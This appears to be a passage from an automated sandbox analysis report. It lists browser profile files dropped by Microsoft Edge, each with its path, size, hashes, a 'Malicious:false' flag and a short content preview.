                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\5020bc69-cc62-4f2f-b822-629506450868.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3ccf6.TMP (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                                  MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                                  SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                                  SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                                  SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):422
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2963717764791545
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kx+vBYebvqBZFUt8/EDG/+/EqV56YebvqBaJ:kGBYebvyg8/Ent6YebvL
                                                                                                                                                                                                                                                                                                                  MD5:937688FD53EA7CF98913E9AD81793301
                                                                                                                                                                                                                                                                                                                  SHA1:00536C86D591DD4175A76CB7EEBB79E4D1354427
                                                                                                                                                                                                                                                                                                                  SHA-256:71D618440F1E11532C8CA3D498AE469E4334D4BC9A46E8A7980345FF4718F073
                                                                                                                                                                                                                                                                                                                  SHA-512:612E7BD4343D3CE3681C8F77AE3EBAFCFD04ABF263A777A06653E75A95EBB2D70A120722136EDC221D7F5DA399049A84CB3851765213020248C7272B852DEBEC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:46.576 16bc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/21-09:48:46.583 16bc Recovering log #3.2024/11/21-09:48:46.587 16bc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):422
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2963717764791545
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kx+vBYebvqBZFUt8/EDG/+/EqV56YebvqBaJ:kGBYebvyg8/Ent6YebvL
                                                                                                                                                                                                                                                                                                                  MD5:937688FD53EA7CF98913E9AD81793301
                                                                                                                                                                                                                                                                                                                  SHA1:00536C86D591DD4175A76CB7EEBB79E4D1354427
                                                                                                                                                                                                                                                                                                                  SHA-256:71D618440F1E11532C8CA3D498AE469E4334D4BC9A46E8A7980345FF4718F073
                                                                                                                                                                                                                                                                                                                  SHA-512:612E7BD4343D3CE3681C8F77AE3EBAFCFD04ABF263A777A06653E75A95EBB2D70A120722136EDC221D7F5DA399049A84CB3851765213020248C7272B852DEBEC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:46.576 16bc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/21-09:48:46.583 16bc Recovering log #3.2024/11/21-09:48:46.587 16bc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.240575720104754
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEs3+q2PCHhJ23oH+TcwtpIFUt8YEsXZmw+YEFtVkwOCHhJ23oH+Tcwta/WLJ:kdvBYebmFUt8/4/+/FT56YebaUJ
                                                                                                                                                                                                                                                                                                                  MD5:11B95E90399957EC7E7A016F6A5F40B6
                                                                                                                                                                                                                                                                                                                  SHA1:160B138BC62F4B25AE5CCFD5033C91281F57DAC7
                                                                                                                                                                                                                                                                                                                  SHA-256:0830860D98D274763B58903F6B354DF543E584FC17E77F8B52018BC033179A60
                                                                                                                                                                                                                                                                                                                  SHA-512:F3CA311C84E63CBC529045630F0643DC4B43CFFE340399E85C1C1CA3EA2F9EDCFC477D254992BFD44B29A63FFC2D594B9C6E44E0CA13A4526A12D05FC999CD02
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.799 1498 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/21-09:48:28.799 1498 Recovering log #3.2024/11/21-09:48:28.800 1498 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.240575720104754
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEs3+q2PCHhJ23oH+TcwtpIFUt8YEsXZmw+YEFtVkwOCHhJ23oH+Tcwta/WLJ:kdvBYebmFUt8/4/+/FT56YebaUJ
                                                                                                                                                                                                                                                                                                                  MD5:11B95E90399957EC7E7A016F6A5F40B6
                                                                                                                                                                                                                                                                                                                  SHA1:160B138BC62F4B25AE5CCFD5033C91281F57DAC7
                                                                                                                                                                                                                                                                                                                  SHA-256:0830860D98D274763B58903F6B354DF543E584FC17E77F8B52018BC033179A60
                                                                                                                                                                                                                                                                                                                  SHA-512:F3CA311C84E63CBC529045630F0643DC4B43CFFE340399E85C1C1CA3EA2F9EDCFC477D254992BFD44B29A63FFC2D594B9C6E44E0CA13A4526A12D05FC999CD02
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.799 1498 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/21-09:48:28.799 1498 Recovering log #3.2024/11/21-09:48:28.800 1498 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2650118817842442
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:KrJ/2qOB1nxCkMTSAELyKOMq+8QTQKC+CVum9:K0q+n0JT9ELyKOMq+8Q7K
                                                                                                                                                                                                                                                                                                                  MD5:DF83F659F3720BBAFAC1A4B03AF9BD9E
                                                                                                                                                                                                                                                                                                                  SHA1:AF9009341AE5840DE26E744F35D3E77499CB2701
                                                                                                                                                                                                                                                                                                                  SHA-256:256E9903D62C39069C93AE6871D9BE84354D638E8835A1E8619C14FEF933F9E0
                                                                                                                                                                                                                                                                                                                  SHA-512:057A1C2CF2AE715641234D1B7BF7FDB35B144DE228301DDDA17070C8A1BEAB3CBB791A2F7271E5F5D12E513AD4346C6716EE41D62296B8B2F6B657D89F630899
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4660891740727344
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcBgs:v7doKsKuKZKlZNmu46yjxX
                                                                                                                                                                                                                                                                                                                  MD5:91DE9823F00D6D0ED42C4EBCA3FB556B
                                                                                                                                                                                                                                                                                                                  SHA1:392C44416546B6EC6274E3BAEA68B402DA321227
                                                                                                                                                                                                                                                                                                                  SHA-256:4AF19E3736EF143304F7E627E910C0868D2C538E53264F40E66F30BBC24F6972
                                                                                                                                                                                                                                                                                                                  SHA-512:DF296DC55643190E776788FBFCD0EB05254A3D6134B4612D24C435E351AEE7D6DD408CA15FCE1F54A769D96D624EAD74DF420D49C456C5452BFBE165A3459E67
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a9288a94-8d77-4295-a1fc-66fea79b4a6f.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):9495
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.11335896144518
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:stQkdpmV7sb9FIa34HkpRb85nbV+FbwQA4kq7NIyPZYJ:stQQmpsb9FXgbGcQxX7NI5
                                                                                                                                                                                                                                                                                                                  MD5:E0D53DF8F5941B19691694C9E1DEE993
                                                                                                                                                                                                                                                                                                                  SHA1:6474CFCBFB97ADCF2D05F5978EA4F9A4A160BF15
                                                                                                                                                                                                                                                                                                                  SHA-256:42DE68201D6864F13E006466A0E69BDCD0252C1F1700723A146CC42D9AB0F0DB
                                                                                                                                                                                                                                                                                                                  SHA-512:C939FAA0BD1D6E36C12C68BDEA72E886DC33DF17CB3E604ED96E8D7596E804203FF47DFA96A2346CBC44355EB1A1611BC7011AB63C64A6D41CDDD6163CF706D3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376674109197488","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                                  MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                                  SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                                  SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                                  SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f20eaaf2-945e-4e1d-af81-153cc1eede70.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.56564327679101
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:y7rP4jWPFuM/f3a8F1+UoAYDCx9Tuqh0VfUC9xbog/OV/mz8YrwYpXtu8:y7rP4jWPIWf3au1jaCK8J4tD
                                                                                                                                                                                                                                                                                                                  MD5:CF391900AFB026F292636AD5B5E1A589
                                                                                                                                                                                                                                                                                                                  SHA1:458A7EBF2D7E00110570C5A23AE34F90A32C6967
                                                                                                                                                                                                                                                                                                                  SHA-256:941B5E4B6F187034F669335C0684290A314287831E6ED0C9ED24E7F5146CDE51
                                                                                                                                                                                                                                                                                                                  SHA-512:162E5FF66094791F5DBDB066D974E8082FC19228746C29B88EAF927668FB8646402FF78C9242AAB9C01EBEBBED4B9F33B137FBECD1BFAD6258E6CDCC6114E919
                                                                                                                                                                                                                                                                                                                  Malicious:false
